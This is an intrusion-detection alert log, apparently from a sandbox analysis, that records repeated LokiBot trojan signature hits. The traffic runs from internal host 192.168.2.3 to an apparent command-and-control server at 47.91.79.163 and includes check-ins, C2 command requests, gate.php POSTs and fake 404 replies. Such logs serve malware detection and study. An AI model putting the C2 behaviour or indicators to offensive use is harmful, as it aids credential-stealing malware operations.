                                    12/03/20-10:02:51.534736TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978180192.168.2.347.91.79.163
                                    12/03/20-10:02:51.534736TCP2025381ET TROJAN LokiBot Checkin4978180192.168.2.347.91.79.163
                                    12/03/20-10:02:51.534736TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978180192.168.2.347.91.79.163
                                    12/03/20-10:02:51.534736TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4978180192.168.2.347.91.79.163
                                    12/03/20-10:02:51.601373TCP2025483ET TROJAN LokiBot Fake 404 Response804978147.91.79.163192.168.2.3
                                    12/03/20-10:02:51.849830TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978280192.168.2.347.91.79.163
                                    12/03/20-10:02:51.849830TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978280192.168.2.347.91.79.163
                                    12/03/20-10:02:51.849830TCP2025381ET TROJAN LokiBot Checkin4978280192.168.2.347.91.79.163
                                    12/03/20-10:02:51.849830TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978280192.168.2.347.91.79.163
                                    12/03/20-10:02:51.849830TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4978280192.168.2.347.91.79.163
                                    12/03/20-10:02:51.905245TCP2025483ET TROJAN LokiBot Fake 404 Response804978247.91.79.163192.168.2.3
                                    12/03/20-10:02:52.137412TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978380192.168.2.347.91.79.163
                                    12/03/20-10:02:52.137412TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978380192.168.2.347.91.79.163
                                    12/03/20-10:02:52.137412TCP2025381ET TROJAN LokiBot Checkin4978380192.168.2.347.91.79.163
                                    12/03/20-10:02:52.137412TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978380192.168.2.347.91.79.163
                                    12/03/20-10:02:52.137412TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4978380192.168.2.347.91.79.163
                                    12/03/20-10:02:52.196885TCP2025483ET TROJAN LokiBot Fake 404 Response804978347.91.79.163192.168.2.3
                                    12/03/20-10:02:52.444506TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978480192.168.2.347.91.79.163
                                    12/03/20-10:02:52.444506TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978480192.168.2.347.91.79.163
                                    12/03/20-10:02:52.444506TCP2025381ET TROJAN LokiBot Checkin4978480192.168.2.347.91.79.163
                                    12/03/20-10:02:52.444506TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978480192.168.2.347.91.79.163
                                    12/03/20-10:02:52.444506TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4978480192.168.2.347.91.79.163
                                    12/03/20-10:02:52.504974TCP2025483ET TROJAN LokiBot Fake 404 Response804978447.91.79.163192.168.2.3
                                    12/03/20-10:02:52.774911TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978580192.168.2.347.91.79.163
                                    12/03/20-10:02:52.774911TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978580192.168.2.347.91.79.163
                                    12/03/20-10:02:52.774911TCP2025381ET TROJAN LokiBot Checkin4978580192.168.2.347.91.79.163
                                    12/03/20-10:02:52.774911TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978580192.168.2.347.91.79.163
                                    12/03/20-10:02:52.774911TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4978580192.168.2.347.91.79.163
                                    12/03/20-10:02:52.833588TCP2025483ET TROJAN LokiBot Fake 404 Response804978547.91.79.163192.168.2.3
                                    12/03/20-10:02:53.118414TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978680192.168.2.347.91.79.163
                                    12/03/20-10:02:53.118414TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978680192.168.2.347.91.79.163
                                    12/03/20-10:02:53.118414TCP2025381ET TROJAN LokiBot Checkin4978680192.168.2.347.91.79.163
                                    12/03/20-10:02:53.118414TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978680192.168.2.347.91.79.163
                                    12/03/20-10:02:53.118414TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4978680192.168.2.347.91.79.163
                                    12/03/20-10:02:53.234137TCP2025483ET TROJAN LokiBot Fake 404 Response804978647.91.79.163192.168.2.3
                                    12/03/20-10:02:53.460522TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978880192.168.2.347.91.79.163
                                    12/03/20-10:02:53.460522TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978880192.168.2.347.91.79.163
                                    12/03/20-10:02:53.460522TCP2025381ET TROJAN LokiBot Checkin4978880192.168.2.347.91.79.163
                                    12/03/20-10:02:53.460522TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978880192.168.2.347.91.79.163
                                    12/03/20-10:02:53.460522TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4978880192.168.2.347.91.79.163
                                    12/03/20-10:02:53.519107TCP2025483ET TROJAN LokiBot Fake 404 Response804978847.91.79.163192.168.2.3
                                    12/03/20-10:02:53.749878TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978980192.168.2.347.91.79.163
                                    12/03/20-10:02:53.749878TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978980192.168.2.347.91.79.163
                                    12/03/20-10:02:53.749878TCP2025381ET TROJAN LokiBot Checkin4978980192.168.2.347.91.79.163
                                    12/03/20-10:02:53.749878TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978980192.168.2.347.91.79.163
                                    12/03/20-10:02:53.749878TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4978980192.168.2.347.91.79.163
                                    12/03/20-10:02:53.808731TCP2025483ET TROJAN LokiBot Fake 404 Response804978947.91.79.163192.168.2.3
                                    12/03/20-10:02:54.121373TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979080192.168.2.347.91.79.163
                                    12/03/20-10:02:54.121373TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979080192.168.2.347.91.79.163
                                    12/03/20-10:02:54.121373TCP2025381ET TROJAN LokiBot Checkin4979080192.168.2.347.91.79.163
                                    12/03/20-10:02:54.121373TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979080192.168.2.347.91.79.163
                                    12/03/20-10:02:54.121373TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4979080192.168.2.347.91.79.163
                                    12/03/20-10:02:54.179342TCP2025483ET TROJAN LokiBot Fake 404 Response804979047.91.79.163192.168.2.3
                                    12/03/20-10:02:54.407060TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979180192.168.2.347.91.79.163
                                    12/03/20-10:02:54.407060TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979180192.168.2.347.91.79.163
                                    12/03/20-10:02:54.407060TCP2025381ET TROJAN LokiBot Checkin4979180192.168.2.347.91.79.163
                                    12/03/20-10:02:54.407060TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979180192.168.2.347.91.79.163
                                    12/03/20-10:02:54.407060TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4979180192.168.2.347.91.79.163
                                    12/03/20-10:02:54.467419TCP2025483ET TROJAN LokiBot Fake 404 Response804979147.91.79.163192.168.2.3
                                    12/03/20-10:02:55.055545TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979280192.168.2.347.91.79.163
                                    12/03/20-10:02:55.055545TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979280192.168.2.347.91.79.163
                                    12/03/20-10:02:55.055545TCP2025381ET TROJAN LokiBot Checkin4979280192.168.2.347.91.79.163
                                    12/03/20-10:02:55.055545TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979280192.168.2.347.91.79.163
                                    12/03/20-10:02:55.055545TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4979280192.168.2.347.91.79.163
                                    12/03/20-10:02:55.114170TCP2025483ET TROJAN LokiBot Fake 404 Response804979247.91.79.163192.168.2.3
                                    12/03/20-10:02:55.316098TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979380192.168.2.347.91.79.163
                                    12/03/20-10:02:55.316098TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979380192.168.2.347.91.79.163
                                    12/03/20-10:02:55.316098TCP2025381ET TROJAN LokiBot Checkin4979380192.168.2.347.91.79.163
                                    12/03/20-10:02:55.316098TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979380192.168.2.347.91.79.163
                                    12/03/20-10:02:55.316098TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4979380192.168.2.347.91.79.163
                                    12/03/20-10:02:55.375068TCP2025483ET TROJAN LokiBot Fake 404 Response804979347.91.79.163192.168.2.3
                                    12/03/20-10:02:56.857683TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979480192.168.2.347.91.79.163
                                    12/03/20-10:02:56.857683TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979480192.168.2.347.91.79.163
                                    12/03/20-10:02:56.857683TCP2025381ET TROJAN LokiBot Checkin4979480192.168.2.347.91.79.163
                                    12/03/20-10:02:56.857683TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979480192.168.2.347.91.79.163
                                    12/03/20-10:02:56.857683TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4979480192.168.2.347.91.79.163
                                    12/03/20-10:02:56.919630TCP2025483ET TROJAN LokiBot Fake 404 Response804979447.91.79.163192.168.2.3
                                    12/03/20-10:02:57.187963TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979580192.168.2.347.91.79.163
                                    12/03/20-10:02:57.187963TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979580192.168.2.347.91.79.163
                                    12/03/20-10:02:57.187963TCP2025381ET TROJAN LokiBot Checkin4979580192.168.2.347.91.79.163
                                    12/03/20-10:02:57.187963TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979580192.168.2.347.91.79.163
                                    12/03/20-10:02:57.187963TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4979580192.168.2.347.91.79.163
                                    12/03/20-10:02:57.247362TCP2025483ET TROJAN LokiBot Fake 404 Response804979547.91.79.163192.168.2.3
                                    12/03/20-10:02:57.510316TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979680192.168.2.347.91.79.163
                                    12/03/20-10:02:57.510316TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979680192.168.2.347.91.79.163
                                    12/03/20-10:02:57.510316TCP2025381ET TROJAN LokiBot Checkin4979680192.168.2.347.91.79.163
                                    12/03/20-10:02:57.510316TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979680192.168.2.347.91.79.163
                                    12/03/20-10:02:57.510316TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4979680192.168.2.347.91.79.163
                                    12/03/20-10:02:57.671838TCP2025483ET TROJAN LokiBot Fake 404 Response804979647.91.79.163192.168.2.3
                                    12/03/20-10:02:57.913059TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979780192.168.2.347.91.79.163
                                    12/03/20-10:02:57.913059TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979780192.168.2.347.91.79.163
                                    12/03/20-10:02:57.913059TCP2025381ET TROJAN LokiBot Checkin4979780192.168.2.347.91.79.163
                                    12/03/20-10:02:57.913059TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979780192.168.2.347.91.79.163
                                    12/03/20-10:02:57.913059TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4979780192.168.2.347.91.79.163
                                    12/03/20-10:02:57.976096TCP2025483ET TROJAN LokiBot Fake 404 Response804979747.91.79.163192.168.2.3
                                    12/03/20-10:02:58.226168TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979880192.168.2.347.91.79.163
                                    12/03/20-10:02:58.226168TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979880192.168.2.347.91.79.163
                                    12/03/20-10:02:58.226168TCP2025381ET TROJAN LokiBot Checkin4979880192.168.2.347.91.79.163
                                    12/03/20-10:02:58.226168TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979880192.168.2.347.91.79.163
                                    12/03/20-10:02:58.226168TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4979880192.168.2.347.91.79.163
                                    12/03/20-10:02:58.284836TCP2025483ET TROJAN LokiBot Fake 404 Response804979847.91.79.163192.168.2.3
                                    12/03/20-10:02:58.533427TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979980192.168.2.347.91.79.163
                                    12/03/20-10:02:58.533427TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979980192.168.2.347.91.79.163
                                    12/03/20-10:02:58.533427TCP2025381ET TROJAN LokiBot Checkin4979980192.168.2.347.91.79.163
                                    12/03/20-10:02:58.533427TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979980192.168.2.347.91.79.163
                                    12/03/20-10:02:58.533427TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4979980192.168.2.347.91.79.163
                                    12/03/20-10:02:58.594890TCP2025483ET TROJAN LokiBot Fake 404 Response804979947.91.79.163192.168.2.3
                                    12/03/20-10:02:58.817428TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980080192.168.2.347.91.79.163
                                    12/03/20-10:02:58.817428TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980080192.168.2.347.91.79.163
                                    12/03/20-10:02:58.817428TCP2025381ET TROJAN LokiBot Checkin4980080192.168.2.347.91.79.163
                                    12/03/20-10:02:58.817428TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980080192.168.2.347.91.79.163
                                    12/03/20-10:02:58.817428TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4980080192.168.2.347.91.79.163
                                    12/03/20-10:02:58.876024TCP2025483ET TROJAN LokiBot Fake 404 Response804980047.91.79.163192.168.2.3
                                    12/03/20-10:02:59.111866TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980180192.168.2.347.91.79.163
                                    12/03/20-10:02:59.111866TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980180192.168.2.347.91.79.163
                                    12/03/20-10:02:59.111866TCP2025381ET TROJAN LokiBot Checkin4980180192.168.2.347.91.79.163
                                    12/03/20-10:02:59.111866TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980180192.168.2.347.91.79.163
                                    12/03/20-10:02:59.111866TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4980180192.168.2.347.91.79.163
                                    12/03/20-10:02:59.170836TCP2025483ET TROJAN LokiBot Fake 404 Response804980147.91.79.163192.168.2.3
                                    12/03/20-10:02:59.381632TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980280192.168.2.347.91.79.163
                                    12/03/20-10:02:59.381632TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980280192.168.2.347.91.79.163
                                    12/03/20-10:02:59.381632TCP2025381ET TROJAN LokiBot Checkin4980280192.168.2.347.91.79.163
                                    12/03/20-10:02:59.381632TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980280192.168.2.347.91.79.163
                                    12/03/20-10:02:59.381632TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4980280192.168.2.347.91.79.163
                                    12/03/20-10:02:59.445429TCP2025483ET TROJAN LokiBot Fake 404 Response804980247.91.79.163192.168.2.3
                                    12/03/20-10:02:59.677287TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980580192.168.2.347.91.79.163
                                    12/03/20-10:02:59.677287TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980580192.168.2.347.91.79.163
                                    12/03/20-10:02:59.677287TCP2025381ET TROJAN LokiBot Checkin4980580192.168.2.347.91.79.163
                                    12/03/20-10:02:59.677287TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980580192.168.2.347.91.79.163
                                    12/03/20-10:02:59.677287TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4980580192.168.2.347.91.79.163
                                    12/03/20-10:02:59.735946TCP2025483ET TROJAN LokiBot Fake 404 Response804980547.91.79.163192.168.2.3
                                    12/03/20-10:02:59.972610TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980680192.168.2.347.91.79.163
                                    12/03/20-10:02:59.972610TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980680192.168.2.347.91.79.163
                                    12/03/20-10:02:59.972610TCP2025381ET TROJAN LokiBot Checkin4980680192.168.2.347.91.79.163
                                    12/03/20-10:02:59.972610TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980680192.168.2.347.91.79.163
                                    12/03/20-10:02:59.972610TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4980680192.168.2.347.91.79.163
                                    12/03/20-10:03:00.035091TCP2025483ET TROJAN LokiBot Fake 404 Response804980647.91.79.163192.168.2.3
                                    12/03/20-10:03:00.268385TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980780192.168.2.347.91.79.163
                                    12/03/20-10:03:00.268385TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980780192.168.2.347.91.79.163
                                    12/03/20-10:03:00.268385TCP2025381ET TROJAN LokiBot Checkin4980780192.168.2.347.91.79.163
                                    12/03/20-10:03:00.268385TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980780192.168.2.347.91.79.163
                                    12/03/20-10:03:00.268385TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4980780192.168.2.347.91.79.163
                                    12/03/20-10:03:00.328425TCP2025483ET TROJAN LokiBot Fake 404 Response804980747.91.79.163192.168.2.3
                                    12/03/20-10:03:01.603999TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980880192.168.2.347.91.79.163
                                    12/03/20-10:03:01.603999TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980880192.168.2.347.91.79.163
                                    12/03/20-10:03:01.603999TCP2025381ET TROJAN LokiBot Checkin4980880192.168.2.347.91.79.163
                                    12/03/20-10:03:01.603999TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980880192.168.2.347.91.79.163
                                    12/03/20-10:03:01.603999TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4980880192.168.2.347.91.79.163
                                    12/03/20-10:03:01.806380TCP2025483ET TROJAN LokiBot Fake 404 Response804980847.91.79.163192.168.2.3
                                    12/03/20-10:03:02.010652TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980980192.168.2.347.91.79.163
                                    12/03/20-10:03:02.010652TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980980192.168.2.347.91.79.163
                                    12/03/20-10:03:02.010652TCP2025381ET TROJAN LokiBot Checkin4980980192.168.2.347.91.79.163
                                    12/03/20-10:03:02.010652TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980980192.168.2.347.91.79.163
                                    12/03/20-10:03:02.010652TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4980980192.168.2.347.91.79.163
                                    12/03/20-10:03:02.067979TCP2025483ET TROJAN LokiBot Fake 404 Response804980947.91.79.163192.168.2.3
                                    12/03/20-10:03:02.313843TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981080192.168.2.347.91.79.163
                                    12/03/20-10:03:02.313843TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981080192.168.2.347.91.79.163
                                    12/03/20-10:03:02.313843TCP2025381ET TROJAN LokiBot Checkin4981080192.168.2.347.91.79.163
                                    12/03/20-10:03:02.313843TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981080192.168.2.347.91.79.163
                                    12/03/20-10:03:02.313843TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4981080192.168.2.347.91.79.163
                                    12/03/20-10:03:02.375624TCP2025483ET TROJAN LokiBot Fake 404 Response804981047.91.79.163192.168.2.3
                                    12/03/20-10:03:02.613556TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981180192.168.2.347.91.79.163
                                    12/03/20-10:03:02.613556TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981180192.168.2.347.91.79.163
                                    12/03/20-10:03:02.613556TCP2025381ET TROJAN LokiBot Checkin4981180192.168.2.347.91.79.163
                                    12/03/20-10:03:02.613556TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981180192.168.2.347.91.79.163
                                    12/03/20-10:03:02.613556TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4981180192.168.2.347.91.79.163
                                    12/03/20-10:03:02.672328TCP2025483ET TROJAN LokiBot Fake 404 Response804981147.91.79.163192.168.2.3
                                    12/03/20-10:03:02.888199TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981280192.168.2.347.91.79.163
                                    12/03/20-10:03:02.888199TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981280192.168.2.347.91.79.163
                                    12/03/20-10:03:02.888199TCP2025381ET TROJAN LokiBot Checkin4981280192.168.2.347.91.79.163
                                    12/03/20-10:03:02.888199TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981280192.168.2.347.91.79.163
                                    12/03/20-10:03:02.888199TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4981280192.168.2.347.91.79.163
                                    12/03/20-10:03:02.951845TCP2025483ET TROJAN LokiBot Fake 404 Response804981247.91.79.163192.168.2.3
                                    12/03/20-10:03:03.157768TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981380192.168.2.347.91.79.163
                                    12/03/20-10:03:03.157768TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981380192.168.2.347.91.79.163
                                    12/03/20-10:03:03.157768TCP2025381ET TROJAN LokiBot Checkin4981380192.168.2.347.91.79.163
                                    12/03/20-10:03:03.157768TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981380192.168.2.347.91.79.163
                                    12/03/20-10:03:03.157768TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4981380192.168.2.347.91.79.163
                                    12/03/20-10:03:03.217158TCP2025483ET TROJAN LokiBot Fake 404 Response804981347.91.79.163192.168.2.3
                                    12/03/20-10:03:03.503054TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981480192.168.2.347.91.79.163
                                    12/03/20-10:03:03.503054TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981480192.168.2.347.91.79.163
                                    12/03/20-10:03:03.503054TCP2025381ET TROJAN LokiBot Checkin4981480192.168.2.347.91.79.163
                                    12/03/20-10:03:03.503054TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981480192.168.2.347.91.79.163
                                    12/03/20-10:03:03.503054TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4981480192.168.2.347.91.79.163
                                    12/03/20-10:03:03.562713TCP2025483ET TROJAN LokiBot Fake 404 Response804981447.91.79.163192.168.2.3
                                    12/03/20-10:03:03.856348TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981580192.168.2.347.91.79.163
                                    12/03/20-10:03:03.856348TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981580192.168.2.347.91.79.163
                                    12/03/20-10:03:03.856348TCP2025381ET TROJAN LokiBot Checkin4981580192.168.2.347.91.79.163
                                    12/03/20-10:03:03.856348TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981580192.168.2.347.91.79.163
                                    12/03/20-10:03:03.856348TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4981580192.168.2.347.91.79.163
                                    12/03/20-10:03:03.913267TCP2025483ET TROJAN LokiBot Fake 404 Response804981547.91.79.163192.168.2.3
                                    12/03/20-10:03:04.112260TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981680192.168.2.347.91.79.163
                                    12/03/20-10:03:04.112260TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981680192.168.2.347.91.79.163
                                    12/03/20-10:03:04.112260TCP2025381ET TROJAN LokiBot Checkin4981680192.168.2.347.91.79.163
                                    12/03/20-10:03:04.112260TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981680192.168.2.347.91.79.163
                                    12/03/20-10:03:04.112260TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4981680192.168.2.347.91.79.163
                                    12/03/20-10:03:04.173198TCP2025483ET TROJAN LokiBot Fake 404 Response804981647.91.79.163192.168.2.3
                                    12/03/20-10:03:04.389681TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981780192.168.2.347.91.79.163
                                    12/03/20-10:03:04.389681TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981780192.168.2.347.91.79.163
                                    12/03/20-10:03:04.389681TCP2025381ET TROJAN LokiBot Checkin4981780192.168.2.347.91.79.163
                                    12/03/20-10:03:04.389681TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981780192.168.2.347.91.79.163
                                    12/03/20-10:03:04.389681TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4981780192.168.2.347.91.79.163
                                    12/03/20-10:03:04.451117TCP2025483ET TROJAN LokiBot Fake 404 Response804981747.91.79.163192.168.2.3
                                    12/03/20-10:03:04.904413TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981880192.168.2.347.91.79.163
                                    12/03/20-10:03:04.904413TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981880192.168.2.347.91.79.163
                                    12/03/20-10:03:04.904413TCP2025381ET TROJAN LokiBot Checkin4981880192.168.2.347.91.79.163
                                    12/03/20-10:03:04.904413TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981880192.168.2.347.91.79.163
                                    12/03/20-10:03:04.904413TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4981880192.168.2.347.91.79.163
                                    12/03/20-10:03:04.964256TCP2025483ET TROJAN LokiBot Fake 404 Response804981847.91.79.163192.168.2.3
                                    12/03/20-10:03:05.283815TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981980192.168.2.347.91.79.163
                                    12/03/20-10:03:05.283815TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981980192.168.2.347.91.79.163
                                    12/03/20-10:03:05.283815TCP2025381ET TROJAN LokiBot Checkin4981980192.168.2.347.91.79.163
                                    12/03/20-10:03:05.283815TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981980192.168.2.347.91.79.163
                                    12/03/20-10:03:05.283815TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4981980192.168.2.347.91.79.163
                                    12/03/20-10:03:05.344181TCP2025483ET TROJAN LokiBot Fake 404 Response804981947.91.79.163192.168.2.3
                                    12/03/20-10:03:05.585961TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982080192.168.2.347.91.79.163
                                    12/03/20-10:03:05.585961TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982080192.168.2.347.91.79.163
                                    12/03/20-10:03:05.585961TCP2025381ET TROJAN LokiBot Checkin4982080192.168.2.347.91.79.163
                                    12/03/20-10:03:05.585961TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982080192.168.2.347.91.79.163
                                    12/03/20-10:03:05.585961TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4982080192.168.2.347.91.79.163
                                    12/03/20-10:03:05.649937TCP2025483ET TROJAN LokiBot Fake 404 Response804982047.91.79.163192.168.2.3
                                    12/03/20-10:03:06.054062TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982180192.168.2.347.91.79.163
                                    12/03/20-10:03:06.054062TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982180192.168.2.347.91.79.163
                                    12/03/20-10:03:06.054062TCP2025381ET TROJAN LokiBot Checkin4982180192.168.2.347.91.79.163
                                    12/03/20-10:03:06.054062TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982180192.168.2.347.91.79.163
                                    12/03/20-10:03:06.054062TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4982180192.168.2.347.91.79.163
                                    12/03/20-10:03:06.116900TCP2025483ET TROJAN LokiBot Fake 404 Response804982147.91.79.163192.168.2.3
                                    12/03/20-10:03:06.321848TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982280192.168.2.347.91.79.163
                                    12/03/20-10:03:06.321848TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982280192.168.2.347.91.79.163
                                    12/03/20-10:03:06.321848TCP2025381ET TROJAN LokiBot Checkin4982280192.168.2.347.91.79.163
                                    12/03/20-10:03:06.321848TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982280192.168.2.347.91.79.163
                                    12/03/20-10:03:06.321848TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4982280192.168.2.347.91.79.163
                                    12/03/20-10:03:06.384400TCP2025483ET TROJAN LokiBot Fake 404 Response804982247.91.79.163192.168.2.3
                                    12/03/20-10:03:06.983532TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982380192.168.2.347.91.79.163
                                    12/03/20-10:03:06.983532TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982380192.168.2.347.91.79.163
                                    12/03/20-10:03:06.983532TCP2025381ET TROJAN LokiBot Checkin4982380192.168.2.347.91.79.163
                                    12/03/20-10:03:06.983532TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982380192.168.2.347.91.79.163
